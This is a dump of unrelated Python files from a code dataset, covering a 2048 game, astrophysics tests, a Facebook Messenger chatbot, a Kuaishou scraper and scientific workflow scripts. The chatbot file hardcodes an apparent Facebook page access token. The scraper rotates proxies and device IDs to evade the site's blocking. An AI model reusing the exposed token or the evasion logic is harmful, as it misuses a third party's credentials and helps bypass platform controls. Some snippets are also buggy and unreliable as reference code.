valor(1,5),\n                       valor(2,1), valor(2,2), valor(2,3), valor(2,4), valor(2,5),\n                       valor(3,1), valor(3,2), valor(3,3), valor(3,4), valor(3,5),\n                       valor(4,1), valor(4,2), valor(4,3), valor(4,4), valor(4,5),\n                       valor(5,1), valor(5,2), valor(5,3), valor(5,4), valor(5,5)) # class 07\n    elif letra == 'a':\n        esquerda()\n        regista_jogada(letra) # class 07\n    elif letra == 'd':\n        direita()\n        regista_jogada(letra) # class 07\n    elif letra == 'w':\n        acima()\n        regista_jogada(letra) # class 07\n    elif letra == 's':\n        abaixo()\n        regista_jogada(letra) # class 07\n    elif letra == 'g':\n        debug()\n\n    print_grelha()\n\nregista_pontos(pontuacao()) # class 07\nescreve_registo() # class 07\nprint(\"End\")\n","sub_path":"j2048_modo_texto_41839.py","file_name":"j2048_modo_texto_41839.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"234658617","text":"# TODO implement NLTE tests\n\nimport pytest\n\nfrom os.path import dirname\n\nimport numpy as np\n\nfrom sme.sme import SME_Struct\nfrom sme.iliffe_vector import Iliffe_vector\nfrom sme.vald import ValdFile\nfrom sme.sme_synth import SME_DLL\nfrom sme.nlte import nlte\nfrom sme.solve import get_atmosphere, synthesize_spectrum\n\nfrom sme.config import Config\nfrom sme.large_file_storage import LargeFileStorage\n\ncwd = dirname(__file__)\n\n\n@pytest.fixture\ndef lfs_nlte():\n    config = Config()\n    server = config[\"data.file_server\"]\n    storage = config[\"data.nlte_grids\"]\n    cache = config[\"data.cache.nlte_grids\"]\n    pointers = config[\"data.pointers.nlte_grids\"]\n    lfs_nlte = LargeFileStorage(server, pointers, storage, cache)\n    return lfs_nlte\n\n\ndef make_minimum_structure():\n    sme = SME_Struct()\n    sme.teff = 5000\n    sme.logg = 4.4\n    sme.vmic = 1\n    sme.vmac = 1\n    sme.vsini = 1\n    sme.set_abund(0, \"asplund2009\", \"\")\n    sme.linelist = ValdFile(f\"{cwd}/testcase3.lin\").linelist\n    sme.atmo.source = \"marcs2012p_t2.0.sav\"\n    sme.atmo.method = \"grid\"\n\n    sme.wran = [[6436, 6444]]\n\n    return sme\n\n\ndef test_activate_nlte():\n    sme = make_minimum_structure()\n\n    # Make sure nothing is set yet\n    assert len(sme.nlte.elements) == 0\n\n    # Add an element\n    sme.nlte.set_nlte(\"Ca\")\n    assert len(sme.nlte.elements) == 1\n    assert \"Ca\" in sme.nlte.elements\n\n    # Add it again, shouldn't change anything\n    sme.nlte.set_nlte(\"Ca\")\n    assert len(sme.nlte.elements) == 1\n    assert \"Ca\" in sme.nlte.elements\n\n    # Try to remove something else\n    sme.nlte.remove_nlte(\"Na\")\n    assert len(sme.nlte.elements) == 1\n    assert \"Ca\" in sme.nlte.elements\n\n    # Remove the original element\n    sme.nlte.remove_nlte(\"Ca\")\n    assert len(sme.nlte.elements) == 0\n\n    # Add an element with a custom grid\n    sme.nlte.set_nlte(\"Na\", \"test_grid.grd\")\n    assert len(sme.nlte.elements) == 1\n    assert \"Na\" in sme.nlte.elements\n    assert sme.nlte.grids[\"Na\"] == \"test_grid.grd\"\n\n    # Update custom grid\n    sme.nlte.set_nlte(\"Na\", \"test_grid2.grd\")\n    assert len(sme.nlte.elements) == 1\n    assert sme.nlte.grids[\"Na\"] == \"test_grid2.grd\"\n\n    # Add element without default grid\n    with pytest.raises(ValueError):\n        sme.nlte.set_nlte(\"U\")\n\n    # with a grid it should work\n    sme.nlte.set_nlte(\"U\", \"test_grid.grd\")\n    assert sme.nlte.grids[\"U\"] == \"test_grid.grd\"\n\n\ndef test_run_with_nlte():\n    # NOTE sme structure must have long format for NLTE\n    sme = make_minimum_structure()\n    sme.nlte.set_nlte(\"Ca\")\n\n    sme2 = synthesize_spectrum(sme)\n\n    assert isinstance(sme2.nlte.flags, np.ndarray)\n    assert 
np.issubdtype(sme2.nlte.flags.dtype, np.dtype(\"bool\"))\n assert len(sme2.nlte.flags) == len(sme2.linelist)\n assert np.any(sme2.nlte.flags)\n\n\ndef test_dll(lfs_nlte):\n sme = make_minimum_structure()\n elem = \"Ca\"\n sme.nlte.set_nlte(elem)\n\n libsme = SME_DLL()\n libsme.ResetNLTE()\n\n sme = get_atmosphere(sme, lfs_nlte)\n libsme.InputLineList(sme.linelist)\n libsme.InputModel(sme.teff, sme.logg, sme.vmic, sme.atmo)\n\n # This is essentially what update_depcoefs does, just for one element\n counter = 0\n bmat, linerefs, lineindices = nlte(sme, libsme, elem, lfs_nlte)\n for lr, li in zip(linerefs, lineindices):\n if lr[0] != -1 and lr[1] != -1:\n counter += 1\n libsme.InputNLTE(bmat[:, lr].T, li)\n\n flags = libsme.GetNLTEflags()\n assert np.any(flags)\n assert np.count_nonzero(flags) == counter\n assert len(flags) == len(sme.linelist)\n\n idx = np.where(flags)[0][0]\n coeffs = libsme.GetNLTE(idx)\n assert coeffs is not None\n\n # If we reset NLTE no flags should be set\n libsme.ResetNLTE()\n flags = libsme.GetNLTEflags()\n assert not np.any(flags)\n assert len(flags) == len(sme.linelist)\n\n with pytest.raises(TypeError):\n libsme.InputNLTE(None, 0)\n\n with pytest.raises(TypeError):\n libsme.InputNLTE(bmat[:, [0, 1]].T, 0.1)\n\n with pytest.raises(ValueError):\n libsme.InputNLTE([0, 1], 10)\n\n with pytest.raises(ValueError):\n libsme.InputNLTE(bmat[:, [0, 1]].T, -10)\n\n","sub_path":"test/test_nlte.py","file_name":"test_nlte.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"233000880","text":"# yomamabot/fb_yomamabot/views.py\r\nimport json, requests, random, re\r\nfrom pprint import pprint\r\nimport os\r\n\r\nfrom django.views import generic\r\nfrom django.http.response import HttpResponse\r\n\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.utils.decorators import method_decorator\r\n\r\nfrom chatterbot import ChatBot\r\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\r\nfrom hanziconv import HanziConv\r\nfrom django.conf import settings\r\nfrom fb_Chatbot.googlemap.mapAPI import G_center, G_zoom, request87\r\n# ------------------------ Fill this with your page access token! 
-------------------------------\r\nPAGE_ACCESS_TOKEN = \"EAAEQtzvtPZCYBALeH5PVSZA8EZBgkoOmvDZCXY1ft7S7jZB3hOeEnOzNAFkYtYgVtFxXtqwjVphpcZAXFTyXaBlzp739myROFJpGS6b4SoHiUn4UAoWbUK79bqy5MoWjxpCgf6UHRtj6ZB0Y1aO6jZC6ZBiBkUZA4B0yUROJEqLVWaVQZDZD\"\r\nVERIFY_TOKEN = \"20171013\" \r\nlist1 = ['地址','位置','哪','去']\r\nlisttoolong = ['你','我','他','想','的','要']\r\nlisttoolong_find = 0\r\nlistlocation_find =0\r\n\r\n# def Profile_facebook_message(fbid):\r\n# user_details_url = \"https://graph.facebook.com/v2.6/%s\"%fbid \r\n# user_details_params = {'fields':'first_name,last_name,profile_pic', 'access_token':PAGE_ACCESS_TOKEN} \r\n# user_details = requests.get(user_details_url, user_details_params).json() \r\n# profile_message_url=\"https://graph.facebook.com/v2.6/me/messenger_profile?access_token=%s\"%PAGE_ACCESS_TOKEN\r\n# getstart_msg = json.dumps({\r\n# \"get_started\":{\r\n# \"payload\":\"\"\r\n# },\r\n# \"message\":{\"text\":\"hellow\"}\r\n# })\r\n# status = requests.post(profile_message_url, headers={\"Content-Type\": \"application/json\"},data=getstart_msg)\r\n\r\ndef post_facebook_image(fbid):\r\n G_center\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n response_msg = json.dumps({\r\n \"recipient\":{\"id\":fbid},\r\n \"message\":{\r\n \"attachment\":{\r\n \"type\":\"image\",\"payload\":{\"url\":request87}}}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n # pprint(status.json())\r\n# Helper function\r\ndef post_facebook_message(fbid, recevied_message):\r\n jerry = ChatBot(\"jerry\",storage_adapter=\"chatterbot.storage.SQLStorageAdapter\",database=os.path.join(settings.BASE_DIR,'fb_Chatbot/chat/test'))\r\n jerry.set_trainer(ChatterBotCorpusTrainer)\r\n jerry.train(\"C:\\\\Users\\\\MA303\\Desktop\\\\Chatbot\\\\fb_Chatbot\\\\chat\\\\jerry_DB.json\") \r\n # C:\\Users\\MA303\\Desktop\\Chatbot\\fb_Chatbot\\chat\r\n tokens = re.sub(r\"[^a-zA-Z0-9\\s]\",' ',recevied_message).lower().split()\r\n joke_text = ''\r\n # print (recevied_message)\r\n # print (type (recevied_message))\r\n # print (tokens)\r\n # print (type (tokens))\r\n y = jerry.get_response(recevied_message)\r\n y = HanziConv.toTraditional(y.text)\r\n print(y)\r\n joke_text = y\r\n user_details_url = \"https://graph.facebook.com/v2.6/%s\"%fbid \r\n user_details_params = {'fields':'first_name,last_name,profile_pic', 'access_token':PAGE_ACCESS_TOKEN} \r\n user_details = requests.get(user_details_url, user_details_params).json() \r\n joke_text = 'Yo ..! 
' + joke_text\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n global listlocation_find\r\n global listtoolong_find\r\n global list1\r\n global listtoolong\r\n for i in range(4):\r\n print (listlocation_find)\r\n listlocation_find = recevied_message.find(list1[i])\r\n print(\"after==\")\r\n print (listlocation_find)\r\n if listlocation_find >= 0 :\r\n for r in range(5):\r\n listtoolong_find = recevied_message.find(listtoolong[r])\r\n if listtoolong_find >= 0:\r\n l = listtoolong_find +1\r\n recevied_message = recevied_message[:listtoolong_find] + recevied_message[l:]\r\n print(recevied_message)\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":\"https://www.google.com.tw/maps/search/\"+recevied_message,}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n pprint(status.json())\r\n if recevied_message==\"查詢google圖片\":\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":\"以下是您搜尋的地點\"}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n post_facebook_image(fbid)\r\n if recevied_message == \"旅遊\" :\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\r\n \"text\":\"旅遊選擇如下\",\r\n \"quick_replies\":[\r\n {\r\n \"content_type\":\"text\",\r\n \"title\":\"台北\",\r\n \"payload\":\"\"\r\n },\r\n {\r\n \"content_type\":\"text\",\r\n \"title\":\"宜蘭\",\r\n \"payload\":\"\"\r\n },\r\n {\r\n \"content_type\":\"location\"\r\n }\r\n \r\n ]}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n pprint(status.json())\r\n else :\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid}, \"message\":{\r\n \"text\":joke_text,}})\r\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\r\n pprint(status.json())\r\n\r\n# Create your views here.\r\nclass ChatbotView(generic.View):\r\n def get(self, request, *args, **kwargs):\r\n if self.request.GET['hub.verify_token'] == VERIFY_TOKEN:\r\n return HttpResponse(self.request.GET['hub.challenge'])\r\n else:\r\n return HttpResponse('Error, invalid token')\r\n \r\n @method_decorator(csrf_exempt)\r\n def dispatch(self, request, *args, **kwargs):\r\n return generic.View.dispatch(self, request, *args, **kwargs)\r\n\r\n # Post function to handle Facebook messages\r\n def post(self, request, *args, **kwargs):\r\n # Converts the text payload into a python dictionary\r\n incoming_message = json.loads(self.request.body.decode('utf-8'))\r\n # Facebook recommends going through every entry since they might send\r\n # multiple messages in a single call during high load\r\n # print(incoming_message)\r\n for entry in incoming_message['entry']:\r\n for message in entry['messaging']:\r\n # Check to make sure the received call is a message call\r\n # This might be delivery, optin, postback for other events \r\n if 'message' in message:\r\n # Print the message to the terminal\r\n # pprint(message) \r\n # Assuming the sender only sends text. Non-text messages like stickers, audio, pictures\r\n # are sent as attachments and must be handled accordingly. 
\r\n                    post_facebook_message(message['sender']['id'], message['message']['text'])\r\n\r\n        return HttpResponse()  \r\n\r\n    ","sub_path":"1221 MessengerBot_Googlemap/chatbot/chatbot/Scripts/testbot0429/testbot0429/GooglemapBot/舊版views資料/views_圖片傳送完成版.py","file_name":"views_圖片傳送完成版.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"516451215","text":"import sys\ntry:\n    if sys.argv[1]:\n        meets = [(1,4),(3,5),(0,6),(5,7),(3,8),(5,9),(6,10),(8,11),(8,12),(2,13),(12,14)]\nexcept IndexError:\n    n = int(input())\n    meets = [tuple(map(int, input().split())) for i in range(n)]\n\nMAX = 0\nmeets.sort()\n\nfor i in range(len(meets)):\n    for j in range(len(meets[i:])):\n        end = meets[i][1]\n        start = meets[i+j][0]\n\n        if end > start:\n            continue\n        elif end <= start+1:\n            MAX+=1\n\n\nprint(MAX)\n\n","sub_path":"boj_legacy/1931.py","file_name":"1931.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"329266504","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals, division\nimport subprocess\nimport os\nimport shutil\nimport logging\n\nimport numpy as np\n\nfrom monty.shutil import decompress_dir\n\nfrom custodian.custodian import Job\n\n\n\"\"\"\nThis module implements basic kinds of jobs for FHI-aims runs.\n\"\"\"\n\n\nlogger = logging.getLogger(__name__)\n\n\n__author__ = \"Jan Kloppenburg\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Jan Kloppenburg\"\n__email__ = \"jank@numphys.org\"\n__status__ = \"Beta\"\n__date__ = \"4Aug2019\"\n\nAIMS_INPUT_FILES = {'control.in', 'geometry.in'}\n\nAIMS_OUTPUT_FILES = ['geometry.in.next_step']\n\n\nclass AimsJob(Job):\n    \"\"\"\n    A basic job. Just runs whatever is in the directory. But conceivably\n    can be a complex processing of inputs etc. with initialization.\n    \"\"\"\n\n    def __init__(self, aims_cmd, output_file=\"run\",\n                 stderr_file=\"std_err.txt\", suffix=\"\", final=True,\n                 backup=True, auto_continue=False):\n        \"\"\"\n        This constructor is necessarily complex due to the need for\n        flexibility. For standard kinds of runs, it's often better to use one\n        of the static constructors. The defaults are usually fine too.\n\n        Args:\n            aims_cmd (str): Command to run aims as a list of args. For example,\n                if you are using mpirun, it can be something like\n                [\"mpirun\", \"aims\"]\n            output_file (str): Name of file to direct standard out to.\n                Defaults to \"run\".\n            stderr_file (str): Name of file to direct standard error to.\n                Defaults to \"std_err.txt\".\n            suffix (str): A suffix to be appended to the final output. E.g.,\n                to rename all output from say s.out to\n                s.out.relax1, provide \".relax1\" as the suffix.\n            final (bool): Indicating whether this is the final job in a\n                series. Defaults to True.\n            backup (bool): Whether to backup the initial input files. If True,\n                the control.in and geometry.in will be copied with a\n                \".orig\" appended. 
Defaults to True.\n \"\"\"\n self.aims_cmd = aims_cmd\n self.output_file = output_file\n self.stderr_file = stderr_file\n self.final = final\n self.backup = backup\n self.suffix = suffix\n self.auto_continue = auto_continue\n\n def setup(self):\n \"\"\"\n Performs initial setup for AimsJob, including overriding any settings\n and backing up.\n \"\"\"\n decompress_dir('.')\n actions = []\n\n if self.backup:\n for f in AIMS_INPUT_FILES:\n shutil.copy(f, \"{}.orig\".format(f))\n\n return actions\n\n def run(self):\n \"\"\"\n Perform the actual run.\n\n Returns:\n (subprocess.Popen) Used for monitoring.\n \"\"\"\n cmd = list(self.aims_cmd)\n logger.info(\"Running {}\".format(\" \".join(cmd)))\n with open(self.output_file, 'w') as f_std, open(self.stderr_file, \"w\", buffering=1) as f_err:\n # use line buffering for stderr\n p = subprocess.Popen(cmd, stdout=f_std, stderr=f_err)\n return p\n\n def postprocess(self):\n \"\"\"\n Postprocessing includes renaming and gzipping where necessary.\n \"\"\"\n for f in AIMS_OUTPUT_FILES + [self.output_file]:\n if os.path.exists(f):\n if self.final and self.suffix != \"\":\n shutil.move(f, \"{}{}\".format(f, self.suffix))\n elif self.suffix != \"\":\n shutil.copy(f, \"{}{}\".format(f, self.suffix))\n\n # Remove continuation so if a subsequent job is run in\n # the same directory, will not restart this job.\n if os.path.exists(\"continue.json\"):\n os.remove(\"continue.json\")\n\n @classmethod\n def tddft_run(cls, aims_cmd):\n \"\"\"\n\n :param aims_cmd:\n :return:\n \"\"\"\n pass\n\n @classmethod\n def full_opt_run(cls, aims_cmd, converged_forces=0.01, max_steps=10, **aims_job_kwargs):\n \"\"\"\n Returns a generator of jobs for a full optimization run. Basically,\n this runs an infinite series of geometry optimization jobs until the\n structure is either below threshold or max_steps is reached.\n\n Args:\n aims_cmd (str): Command to run aims as a list of args. For example,\n if you are using mpirun, it can be something like\n [\"mpirun\", \"aims.VERSION.scalapack.mpi\"]\n max_steps (int): The maximum number of runs. Defaults to 10.\n\n **vasp_job_kwargs: Passthrough kwargs to AimsJob. See\n :class:`custodian.fhi_aims.jobs.AimsJob`.\n Returns:\n Generator of jobs.\n \"\"\"\n\n converged_forces = converged_forces\n\n pass\n\n def get_force(output_file='run'):\n \"\"\"\n Return the last force of the prievious run:\n\n :param output_file:\n File to parse\n\n :return:\n last computed total force\n \"\"\"\n max_forces = []\n\n with open(output_file, 'rt') as f:\n for line in f:\n if 'Maximum force component is' in line:\n max_forces.append(float(line.split()[4]))\n if 'Counterproductive step -> revert!' in line:\n max_forces = max_forces[:-1]\n\n return np.amin(max_forces)\n\n yield AimsJob(aims_cmd, final=False, suffix=\".relax%d\" % (i+1), **aims_job_kwargs)\n","sub_path":"custodian/fhi_aims/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439585944","text":"# Autor: Oscar Macias Rodríguez\r\n# Descripción: Pregunta al usuario cuantos boletos quiere comprar para cada tipo de asiento e imprime el total a pagar.\r\n\r\n# Calcula el costo de los asientos A, B y C. 
Además, calcula la suma de los asientos indicados (A, B y C)\r\ndef calcularPago(numeroBoletosA, numeroBoletosB, numeroBoletosC):\r\n asientosA = numeroBoletosA * 925\r\n asientosB = numeroBoletosB * 775\r\n asientosC = numeroBoletosC * 360\r\n totalPago = asientosA + asientosB + asientosC\r\n return totalPago\r\n\r\n# Imprime en pantalla el costo total de los boletos.\r\ndef main():\r\n numeroBoletosA = int(input(\"Numero de boletos de clase A:\"))\r\n numeroBoletosB = int(input(\"Numero de boletos de clase B:\"))\r\n numeroBoletosC = int(input(\"Numero de boletos de clase C:\"))\r\n\r\n totalPago = calcularPago(numeroBoletosA, numeroBoletosB, numeroBoletosC)\r\n\r\n print(\"El costo total es:\", \"$%.2f\" % totalPago)\r\n\r\n\r\nmain()","sub_path":"Asientos en un estadio.py","file_name":"Asientos en un estadio.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556848855","text":"# Author: Arthur Mensch\n# License: BSD\n# Adapted from nilearn example\nimport itertools\nimport os\nimport time\nfrom os.path import expanduser, join\n\nfrom nilearn.datasets import fetch_atlas_smith_2009\nfrom nilearn.image import index_img\nfrom nilearn.plotting import plot_stat_map\nfrom sklearn.externals.joblib import Parallel, delayed\n\nfrom modl.datasets.hcp import get_hcp_data\nfrom modl.spca_fmri import SpcaFmri\n\ntrace_folder = expanduser('~/output/modl/hcp')\n\ndef main():\n # Apply our decomposition estimator with reduction\n n_components = 70\n n_jobs = 1\n raw = True\n init = True\n\n mask, func_filenames = get_hcp_data(raw=raw)\n\n reduction_list = [1, 2, 4, 8, 12]\n alpha_list = [1e-2, 1e-3, 1e-4]\n\n Parallel(n_jobs=n_jobs, verbose=10)(delayed(run)(idx, reduction, alpha,\n mask, raw, n_components,\n init, func_filenames) for\n idx, (reduction, alpha)\n in enumerate(\n itertools.product(reduction_list, alpha_list)))\n\n\ndef run(idx, reduction, alpha, mask, raw, n_components, init, func_filenames):\n output_dir = join(trace_folder, 'experiment_%i' % idx)\n try:\n os.makedirs(output_dir)\n except OSError:\n pass\n dict_fact = SpcaFmri(mask=mask,\n smoothing_fwhm=3,\n batch_size=40,\n shelve=not raw,\n n_components=n_components,\n dict_init=fetch_atlas_smith_2009().rsn70 if\n init else None,\n reduction=reduction,\n alpha=alpha,\n random_state=0,\n n_epochs=2,\n l1_ratio=0.5,\n backend='c',\n memory=expanduser(\"~/nilearn_cache\"), memory_level=2,\n verbose=5,\n n_jobs=1,\n trace_folder=output_dir\n )\n\n print('[Example] Learning maps')\n t0 = time.time()\n dict_fact.fit(func_filenames, raw=raw)\n t1 = time.time() - t0\n print('[Example] Dumping results')\n # Decomposition estimator embeds their own masker\n masker = dict_fact.masker_\n components_img = masker.inverse_transform(dict_fact.components_)\n components_img.to_filename(join(output_dir, 'components_final.nii.gz'))\n print('[Example] Run in %.2f s' % t1)\n # Show components from both methods using 4D plotting tools\n import matplotlib.pyplot as plt\n from nilearn.plotting import plot_prob_atlas, show\n\n print('[Example] Displaying')\n fig, axes = plt.subplots(2, 1)\n plot_prob_atlas(components_img, view_type=\"filled_contours\",\n axes=axes[0])\n plot_stat_map(index_img(components_img, 0),\n axes=axes[1],\n colorbar=False,\n threshold=0)\n plt.savefig(join(output_dir, 'components.pdf'))\n show()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"examples/experimental/fmri/hcp_compare.py","file_name":"hcp_compare.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"465814902","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nimport time\n\nfrom scrapy.utils.project import get_project_settings\nfrom pykafka import KafkaClient\nfrom loguru import logger\nfrom redis import Redis\n\nfrom KuaiShou.items import KuaishouUserInfoIterm\n\n\nclass KuaishouUserCountsSpider(scrapy.Spider):\n name = 'kuaishou_search_overview'\n # allowed_domains = ['live.kuaishou.com/m_graphql']\n # start_urls = ['http://live.kuaishou.com/m_graphql/']\n\n custom_settings = {'ITEM_PIPELINES': {\n 'KuaiShou.pipelines.KuaishouKafkaPipeline': 700,\n 'KuaiShou.pipelines.KuaishouScrapyLogsPipeline': 701\n }}\n settings = get_project_settings()\n # 连接redis\n redis_host = settings.get('REDIS_HOST')\n redis_port = settings.get('REDIS_PORT')\n redis_did_name = settings.get('REDIS_DID_NAME')\n redis_proxyip_name = settings.get('REDIS_PROXYIP_NAME')\n conn = Redis(host=redis_host, port=redis_port)\n\n kuaishou_url = 'http://live.kuaishou.com/m_graphql'\n search_overview_query = settings.get('SEARCH_OVERVIEW_QUERY')\n headers = {'content-type': 'application/json',\n 'Host': 'live.kuaishou.com',\n 'Origin': 'http://live.kuaishou.com'\n }\n\n def start_requests(self):\n # 配置kafka连接信息\n kafka_hosts = self.settings.get('KAFKA_HOSTS')\n kafka_topic = self.settings.get('KAFKA_USERINFO_SEEDS_TOPIC')\n logger.info('kafka info, hosts:{}, topic:{}'.format(kafka_hosts, kafka_topic))\n client = KafkaClient(hosts=kafka_hosts)\n topic = client.topics[kafka_topic]\n # 配置kafka消费信息\n consumer = topic.get_balanced_consumer(\n consumer_group=self.name,\n managed=True,\n auto_commit_enable=True\n )\n # 获取被消费数据的偏移量和消费内容\n for message in consumer:\n try:\n if message is None:\n continue\n # 信息分为message.offset, message.value\n msg_value = message.value.decode()\n msg_value_dict = eval(msg_value)\n if 'spider_name' not in list(msg_value_dict.keys()):\n logger.warning('Excloude key: spider_name, msg: {}'.format(msg_value))\n continue\n if msg_value_dict['spider_name'] != 'kuaishou_user_seeds':\n continue\n user_id = msg_value_dict['userId']\n self.headers['Referer'] = 'https://live.kuaishou.com/search/?keyword={}'.format(user_id)\n self.search_overview_query['variables']['keyword'] = '{}'.format(user_id)\n # logger.info(json.dumps(self.search_overview_query))\n # self.conn.incr('kwai_userInfo_offSetSize', 1)\n yield scrapy.Request(self.kuaishou_url, headers=self.headers,\n body=json.dumps(self.search_overview_query),\n method='POST',\n meta={'bodyJson': self.search_overview_query, 'msg_value_dict': msg_value_dict,\n 'retry_times': 0},\n callback=self.parse_search_overview, dont_filter=True\n )\n except Exception as e:\n logger.warning('Kafka message[{}] structure cannot be resolved :{}'.format(str(msg_value_dict), e))\n\n def parse_search_overview(self, response):\n try:\n rsp_search_overview_json = json.loads(response.text)\n except:\n # 处理在频率过快的时候 response.text = 你想干嘛?等情况\n logger.warning(response.text)\n rsp_search_overview_json = {'data': {'pcSearchOverview': None}}\n time.sleep(10)\n finally:\n logger.info(rsp_search_overview_json)\n pc_search_overview = rsp_search_overview_json['data']['pcSearchOverview']\n msg_value_dict = response.meta['msg_value_dict']\n search_overview_query = response.meta['bodyJson']\n current_retry_times = response.meta['retry_times'] + 1\n 
user_id = msg_value_dict['userId']\n if pc_search_overview == None:\n # 删掉did库中的失效did\n kuaishou_did_json = response.meta['Cookie']\n logger.info('RedisDid srem invaild did:{}'.format(str(kuaishou_did_json)))\n self.conn.zrem(self.redis_did_name, str(kuaishou_did_json).encode('utf-8'))\n # 再次尝试抓取,尝试3次\n logger.warning('userId: {}, pcSearchOverview authors list is None ! '.format(user_id))\n if current_retry_times > 3:\n return self.create_fail_items(user_id, -1)\n logger.warning(\n 'pcSearchOverview failed, result is None, userId: {}, retryTimes: {}'.format(user_id,\n current_retry_times))\n time.sleep(3)\n yield scrapy.Request(self.kuaishou_url, headers=self.headers, body=json.dumps(search_overview_query),\n method='POST',\n meta={'bodyJson': search_overview_query, 'msg_value_dict': msg_value_dict,\n 'retry_times': current_retry_times},\n callback=self.parse_search_overview, dont_filter=True\n )\n else:\n search_overview_list = pc_search_overview['list']\n for search_overview in search_overview_list:\n if search_overview['type'] != 'authors':\n continue\n search_overview_authors = search_overview['list']\n if search_overview_authors != []:\n author_info = search_overview_authors[0]\n yield self.create_sucess_items(user_id, author_info)\n break\n logger.warning('userId: {}, pcSearchOverview authors list is [] ! '.format(user_id))\n invaild_proxy = response.meta['proxy']\n logger.info('Proxy : %s is invaild ! Proxy sreming...' % invaild_proxy)\n self.conn.srem(self.redis_proxyip_name, str(invaild_proxy).encode('utf-8'))\n # 再次尝试抓取,尝试7次\n if current_retry_times > 3:\n yield self.create_fail_items(user_id, -2)\n break\n logger.warning(\n 'pcSearchOverview failed, result is None, userId: {}, retryTimes: {}'.format(user_id,\n current_retry_times))\n time.sleep(3)\n yield scrapy.Request(self.kuaishou_url, headers=self.headers, body=json.dumps(search_overview_query),\n method='POST',\n meta={'bodyJson': search_overview_query, 'msg_value_dict': msg_value_dict,\n 'retry_times': current_retry_times},\n callback=self.parse_search_overview, dont_filter=True\n )\n\n def create_fail_items(self, user_id, fail_type):\n kuaishou_user_info_iterm = KuaishouUserInfoIterm()\n kuaishou_user_info_iterm['spider_name'] = self.name\n kuaishou_user_info_iterm['is_successed'] = fail_type\n kuaishou_user_info_iterm['userId'] = user_id\n return kuaishou_user_info_iterm\n\n def create_sucess_items(self, user_id, author_info):\n kuaishou_user_info_iterm = KuaishouUserInfoIterm()\n logger.info('Search userinfo reslut: {}'.format(str(author_info)))\n kuaishou_user_info_iterm['spider_name'] = self.name\n kuaishou_user_info_iterm['userId'] = user_id\n kuaishou_user_info_iterm['principalId'] = author_info['id']\n kuaishou_user_info_iterm['nickname'] = author_info['name']\n kuaishou_user_info_iterm['avatar'] = author_info['avatar']\n kuaishou_user_info_iterm['sex'] = author_info['sex']\n kuaishou_user_info_iterm['description'] = author_info['description']\n kuaishou_user_info_iterm['fan'] = author_info['counts']['fan']\n kuaishou_user_info_iterm['follow'] = author_info['counts']['follow']\n kuaishou_user_info_iterm['photo'] = author_info['counts']['photo']\n kuaishou_user_info_iterm['is_successed'] = 1\n return kuaishou_user_info_iterm\n","sub_path":"TianShuData/online/KuaiShou/KuaiShou/spiders/kuaishou_search_overview.py","file_name":"kuaishou_search_overview.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
+{"seq_id":"293890539","text":"from tripod2.items.mungers.csv2mets.base import Tripod2MungerBase\nfrom tripod2.items import streams\nimport csv\nfrom django.conf import settings\n\n\n#CSV_FILE_NAME = '20151111_digguide_benjamin_rush_metadata.csv'\nCSV_FILE_NAME = '20160115_alex_harris_metadata.csv'\n\n\nPROPMAP = {\n\n 'Box_Number' : '',\n 'Print_Number' : '',\n 'Title' : '',\n 'Date' : '',\n 'DPC_ID' : '',\n 'Series' : '',\n 'ASpace_componentID' : '',\n 'Extent' : '',\n 'Creator' : '',\n 'Rights' : '',\n 'Spatial_Coverage' : '',\n 'Format' : '',\n 'Type' : '',\n 'IsPartOf' : '',\n\n}\n\n\nclass Tripod2Munger(Tripod2MungerBase):\n default_format = 'image'\n ownerid = 'docarts'\n collectionid = 'alexharris'\n shortid_offset = 11\n propmap = {}\n \n def handle_Spatial_Coverage(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_Creator(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_Subject(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_Format(self, vals, newval):\n return self.handle_delimited_vals(vals, newval)\n\n def handle_item(self, rowdata):\n shortid = rowdata['DPC_ID']\n if shortid == '' or shortid is None:\n return\n\n dmr = self.get_dmr(rowdata)\n amr = self.get_amr(rowdata)\n args = {\n 'amr' : amr,\n 'dmr' : dmr,\n 'files' : self.filemap[shortid],\n 'owner' : 